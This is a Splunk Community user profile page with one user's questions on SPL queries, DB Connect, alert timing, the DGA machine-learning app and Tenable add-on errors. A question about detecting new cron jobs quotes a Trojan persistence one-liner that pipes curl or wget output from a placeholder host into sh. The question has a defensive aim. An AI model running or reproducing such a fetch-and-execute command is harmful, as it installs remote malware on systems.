Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for
- About bestSplunker
bestSplunker
Contributor
Member since:
03-25-2018
09-17-2021
Community Statistics
| Posts | 98 |
| Solutions | 6 |
| Karma Given | 10 |
| Karma Received | 4 |
| Member Since | 03-25-2018 |
Activity Feed
- Got Karma for Re: Can I call the static resources from an app that has global permissions?. 01-19-2022 12:23 PM
- Posted how to use splunk mobile? on Splunk Enterprise. 09-16-2021 06:57 PM
- Posted how to use splunk monitor a cron job add action on Splunk Enterprise. 08-06-2020 07:03 PM
- Karma Re: How to associate dbxquery results with search results? for sduff_splunk. 06-05-2020 12:50 AM
- Karma Re: Can I call the static resources from an app that has global permissions? for deepashri_123. 06-05-2020 12:50 AM
- Karma Re: Can I call the static resources from an app that has global permissions? for deepashri_123. 06-05-2020 12:50 AM
- Karma Re: Can I convert an indexer cluster into a single indexer without losing any data? for tiagofbmm. 06-05-2020 12:50 AM
- Karma Re: How does the search header cluster change to a single search header instance? for chrisyounger. 06-05-2020 12:50 AM
- Got Karma for Error migrating deprecated review status transitions. 06-05-2020 12:50 AM
- Karma Re: how to list all hosts and sourcetypes of all indexes quickly for niketn. 06-05-2020 12:49 AM
- Karma Re: short json get truncated even if TRUNCATE is set to 0 for FrankVl. 06-05-2020 12:49 AM
- Karma Re: How do you restart splunk? for solarboyz1. 06-05-2020 12:49 AM
- Karma Re: Is there a best way sent alert content to a API interface of other system for cpetterborg. 06-05-2020 12:49 AM
- Got Karma for Re: how to list all hosts and sourcetypes of all indexes quickly. 06-05-2020 12:49 AM
- Got Karma for Can I install SolarWinds Add-on for Splunk on a search head?. 06-05-2020 12:49 AM
- Karma Re: Temporarily disable deployment server? for jspears. 06-05-2020 12:46 AM
- Posted How to use timechart to show increase in recent 7 days on Splunk Search. 05-28-2020 07:31 PM
- Posted how to display 2 numbers on in the same Single Value panel on Splunk Search. 04-26-2020 06:40 PM
- Tagged how to display 2 numbers on in the same Single Value panel on Splunk Search. 04-26-2020 06:40 PM
- Posted Re: Error in 'noop' command : invalid argument:'search_optimization' on All Apps and Add-ons. 03-25-2020 12:40 AM
09-16-2021
06:57 PM
I want to view splunk dashboard and receive splunk alert on mobile device. my splunk enterprise instance (version 8.2.4) address is `http://192.168.1.100:8000`. now, I hava download `splunk mobile` app installed my Andriod device. but it let me enter the address ending in 'splunkcloud.com', it is only support splunk cloud ? any one kwon how to login my splunk enterprise on splunk mobile? and is ther a tutorial? thank you for anyone !
... View more
Labels
- Labels:
-
installation
-
using Splunk Enterprise
08-06-2020
07:03 PM
when some Trojans or virus are implanted in the Linux OS. it will add cron job to persist the Trojans . for example: curl -fsSL https://xxxx.com/raw/sByq0rym ||wget -q -0- https://xxx.com/raw/sByq0rym)|sh so, can I use splunk to monitor newly added cron job ?
... View more
Labels
- Labels:
-
using Splunk Enterprise
05-28-2020
07:31 PM
hey, I cant use |timechart count span=1d to calculate recent 8 days count, search result as follow:
_time count
2020/05/21 100
2020/05/22 120
2020/05/23 180
2020/05/24 200
2020/05/25 270
2020/05/26 380
2020/05/27 490
2020/05/28 680
now,I want to calculate the increase quantity of each day compared with the previous day. The results should be as follows
_time increase
2020/05/22 20
2020/05/23 60
2020/05/24 20
2020/05/25 70
2020/05/26 110
2020/05/27 110
2020/05/28 190
then use timechart show the increase quantity |timechart count span=1d
is there have a simple search statement to do it?
... View more
- Tags:
- splunk-enterprise
04-26-2020
06:40 PM
I want to show the number of successes and failures in a single value panel. How should I do this?
splunk version: 6.4.3
Like the screenshot below, green is successful, red is failures
index = test
|eval classification=if(eventtype="a","successful","failures")
|stats count by classification
... View more
- Tags:
- splunk
03-25-2020
12:40 AM
@Noah_Woodcock I don't know why. it haven't thrown an error now,but it didn't speed up the search
... View more
03-24-2020
11:45 PM
@richgalloway 7.2.3
... View more
03-19-2020
08:38 PM
I am trying to optimize the query speed of the db connect app . I have read the following post, it tell me I can use | noop search_optimization=false , but splunk return an error when I using.
Error in 'noop' command : invalid argument:'search_optimization'
this my search :
|noop search_optimization = false|dbxquery connection="connectTestDB" query="select * from clientData"
I also tried to add | noop search_optimization=false at end of dbxquery ,errors remain
... View more
03-15-2020
10:57 PM
thank you very much, so if i use index time, I can ignore time range of the alert settting, because index time in search effect takes precedence over time range?
... View more
03-12-2020
07:17 PM
@pdrieger_splunk
thank you very much for your reply,according to the second method you mentioned, do I need to modify the SPL of dga_feedback_kvstroe , modify the index = dga_proxy to domain_input , so that I can manually adjust the false-positive dga domain to legit, and for the fourth point, I don't quite understand how to do it. forgive me for just learned use MLTK
... View more
03-12-2020
03:08 AM
I have some real DNS data obtained from IDS, I can get it by the following search statement
index = ids sourcetype=suricata event_type=dns | table _time src_ip domain
I have read Operationalize Machine Learning part of the dga app for splunk
Setup notes:
1、Create an index that holds domain names and computed features (we used a index named "dga_proxy")
2、Activate scheduled searches (app menu: More > Alerts) to generate sample data and fill this index.
3、Check the macro domain_input in Settings > Advanced Search if you have custom naming
Following the instructions above, I did the following:
1、create an index , the index is named dga_prod
2、create a scheduled searches alert, the spl as follows:
index=ids event_type=dns
|stats latest(_time) as _time,values(src_ip) as src_ip,values(dest_ip) as dest_ip,values(dns.answer{}.rrtype) as type,values(dns.type) as dns_type,values(asset_name) as asset_name count by domain
| 'ut_shannon(domain)'
| 'ut_meaning(domain)'
| eval ut_digit_ratio = 0.0
| eval ut_vowel_ratio = 0.0
| eval ut_domain_length = max(1,len(domain))
| rex field=domain max_match=0 "(?\d)"
| rex field=domain max_match=0 "(?[aeiou])"
| eval ut_digit_ratio=if(isnull(digits),0.0,mvcount(digits) / ut_domain_length)
| eval ut_vowel_ratio=if(isnull(vowels),0.0,mvcount(vowels) / ut_domain_length)
| eval ut_consonant_ratio = max(0.0, 1.000000 - ut_digit_ratio - ut_vowel_ratio)
| eval ut_vc_ratio = ut_vowel_ratio / ut_consonant_ratio
| apply "dga_ngram"
| apply "dga_pca"
| apply "dga_randomforest" as class
| fields - digits - vowels - domain_tfidf*
|collect index = dga_prod
this alert like dga_eventgen , run every minute to fill dga_prod index.
3、edit domain_input macro , modify deafult index = dga_proxy to index=dga_prod
I have some questions:
1.Am I doing it correctly?
2.how to solve false positive, I see that some very normal domain names are also detected as dga, for example: my company's domain name brower.360.cn , www.xmind.cn , http.kali.org etc.... do I need add it to whitelist and how to do it?
3.I can't find more related dag app for splunk documents, videos, manuals, etc. I also just learned to use MLTK.
... View more
03-11-2020
08:51 PM
@pdrieger_splunk Is there a detailed reference manual?
... View more
02-26-2020
08:03 PM
hello everyone:
I have create db connect inputs, It reads record from the database every five minutes to the Splunk index.
but I found that there was a 30 minute difference between index time and event time. as follows:
index = test
|eval indextime=strftime(_indextime,"%Y/%m/%d %H:%M:%S")
|eval age=(_indextime - _time)/60
|table indextime _time age
--------------------------------------------------------------------------------------------------
indextime _time age
2020/02/27 11:40:00 2020/02/27 11:11:14 28.76667
2020/02/27 10: 30:00 2020/02/27 09: 59:36 30.40000
2020/02/27 10:25: 00 2020/02/27 09: 56: 48 28.20000
now, I want to create an alert to query important events , I hope this alert to run every 10 minutes, so how to set the time range in alert setting correctly, prevent missing important events or repeating alert?
time range: ???? How to set up correctly
cron expresion : */10 * * * *
... View more
01-06-2020
01:09 AM
Can DB connect app solve this problem? Or do I have to use Python scripts to do this?
... View more
12-19-2019
05:51 PM
I have a application that produced a database with a current date everyday. (i.e today is 2019.12.20,then database name is DATA.20191220). I will to create a db input, the sql statement as follows:
select * from "DATA.20191220"."dbo"."PRINT_LOG"
If it's tomorrow, the sql statement should become as follows
select * from "DATA.20191221"."dbo"."PRINT_LOG"
but I don't known how to connect a dynamic db name via DB connect App.
if u have a good idea,could u share it with me? thanks in advace.
forgive my English level, English is not my first language.
... View more
11-14-2019
05:02 PM
Does Splunk Enterprise Security have such anomaly detection function?
... View more
11-14-2019
12:32 AM
you may also be two scenarios to consider:
account admin may not have been logged in before. Now the account admin is logged in. If it is compared with the last time or previous 7 days, it will not find a historical data that can be referenced,this scenario needs to be alert.
account admin may have 2 or more IP addresses in the previous 7 days, In this scenario, I only need to compare the IP address of the last login. If it is inconsistent,then alert
... View more
11-14-2019
12:15 AM
hello everyone. I have an alert requirement . an administort has login the device. I want to compare his current IP address with that of the last time or previous 7 days,If different, then alert. However, there are multiple administrator accounts, the fixed IP address used by each administrator may also be different. For example, admin often uses IP 2.2.2.2 to log in to the device, and admin2 often uses IP 3.3.3.3 to log in to the device
On November 14, 2019 . These two administrators use a different IP login device than usual. I think this is an abnormal behavior, whether they login successfully or fail
_time account src_ip status
2019/11/14 14:30:00 admin2 4.4.4.4 Failed
2019/11/14 14:00:00 admin 1.1.1.1 success
2019/11/14 09:00:00 admin 2.2.2.2 success
2019/11/13 09:00:00 admin2 3.3.3.3 success
2019/11/13 08:00:00 admin 2.2.2.2 success
2019/11/12 11:00:00 admin 2.2.2.2 success
2019/11/11 10:00:00 admin 2.2.2.2 success
2019/11/10 00:00:00 admin 2.2.2.2 success
2019/11/09 09:00:00 admin2 3.3.3.3 Failed
2019/11/08 09:00:00 admin2 3.3.3.3 success
How should I write this spl and configure alert?
I want to check the login log every 5 minutes, and then compare the login IP with that of the previous 7 days OR last time
all the help will be appreciated
... View more
- Tags:
- splunk-enterprise
09-11-2019
05:39 PM
Because I saw the title of the website is nessuc scanner(SC), so I mistakenly think it is Tenable.sc
... View more
09-11-2019
02:39 AM
hello everyone. please forgive my English level. I'm a splunk novice and nessus novice.
I am trying to ingest the Tenable(sc) vulnerability data into the splunk indexer, I have read the official document related to Tenable Add-On for Splunk , (link : https://docs.tenable.com/integrations/splunk/Content/Splunk%20Add%20On.htm). I think my type of Tenable is Tenable.sc, not Tenable.io.Please see the screenshot below:
I'am trying to configure Tenable Add-On for Splunk ,but it return an error message Please enter valid Address, Username and Password. , as shown below:
I have tried to delete the port number in the address (192.168.20.129) and checked "Verify SSL Certificate", but still not working , I have tested all the configurations.
if I change the "Tenable Account Type" to Tenable.io and using access_key 、 secret Key , it can successfully create configuration successfully. but after successfully create the input, the vulnerability data is not indexed into splunk. and I can find the following error from the log file error.log (/opt/splunk/var/log/splunk/ta_tenable_tenable_io.log)
2019-09-11 16:09:56,668 INFO pid=10770 tid=MainThread file=base_modinput.py:log_info:293 | Tenable.io vulnerability data collection started
2019-09-11 16:09:56,669 INFO pid=10770 tid=MainThread file=splunk_rest_client.py:_request_handler:100 | Use HTTP connection pooling
2019-09-11 16:09:56,670 INFO pid=10770 tid=MainThread file=connectionpool.py:_new_conn:758 | Starting new HTTPS connection (1): 127.0.0.1
2019-09-11 16:09:56,693 ERROR pid=10770 tid=MainThread file=io_connect.py:__check_response:80 | Tenable Error: response: {"error":"The requested file was not found"}
I am trying to force the creation of Tenable.sc account configuration information (ta_tenable_account.conf) on the command line. then select Global Account* when configuring the input. When I click the "add" button, the following error still occurs:
2019-09-11 16:34:12,528 ERROR pid=19830 tid=MainThread file=sc_connect.py:_check_response:98 | Tenable SC Error: URL: https://192.168.20.129:8834/rest/system, HTTP status code: 404, error code: 1
So I re-read the principle of Tenable Add-on, which calls the Tenable API to extract data from the Tenable platform. link (https://docs.tenable.com/integrations/splunk/Content/Splunk%20Add%20On.htm)
The Tenable Add-On for Splunk pulls data from Tenable platforms and normalizes it in Splunk.
The current Tenable Add-On uses the following endpoints.
Tenable.io
Request Export: /vulns/export
Vulnerability Export: /vulns/export
Asset Export: /assets/export
Tenable.sc
Vulnerability and assets details: /rest/analysis
Plugin details: /rest/plugins
Repository details: /rest/repository
The reason for the error was that my Nessus does not provide an API at all. . When I tried to access these API links using a browser, it returned 404 not found.
E.g:
Tenable.io Vulnerability Export is called api /vulns/export . When I try to access "https://192.168.20.129:8834/vulns/export", the browser returns a status code of 404 with the content: "{"error":" The requested file was not found"}"
Tenable.sc Vulnerability and assets detail is called api /rest/analysis , when I try to access the "https://192.168.20.129:8834/rest/analysis" browser returns a status code of 404, the content is: "{"error": "The requested file was not found"}"
question:
Why doesn't my Nessus provide an API interface?
Do I need to configure nessus to enable the api interface?
Is there a nessus expert who can tell me whether my nessus type is tenable.io or tenable.sc
... View more
Labels
- Labels:
-
troubleshooting
08-26-2019
06:13 PM
@Sukisen1981 thank you for your reply ,but It doesn't seem like a very easy way to do that. I have more than 100 alerts. Do I need to merge each one alert into a dummy json? In addition, this format looks very ugly in mail messages.
... View more
Contact Me
| Online Status |
Offline
|
| Date Last Visited |
09-17-2021
02:20 AM
|
Karma given to
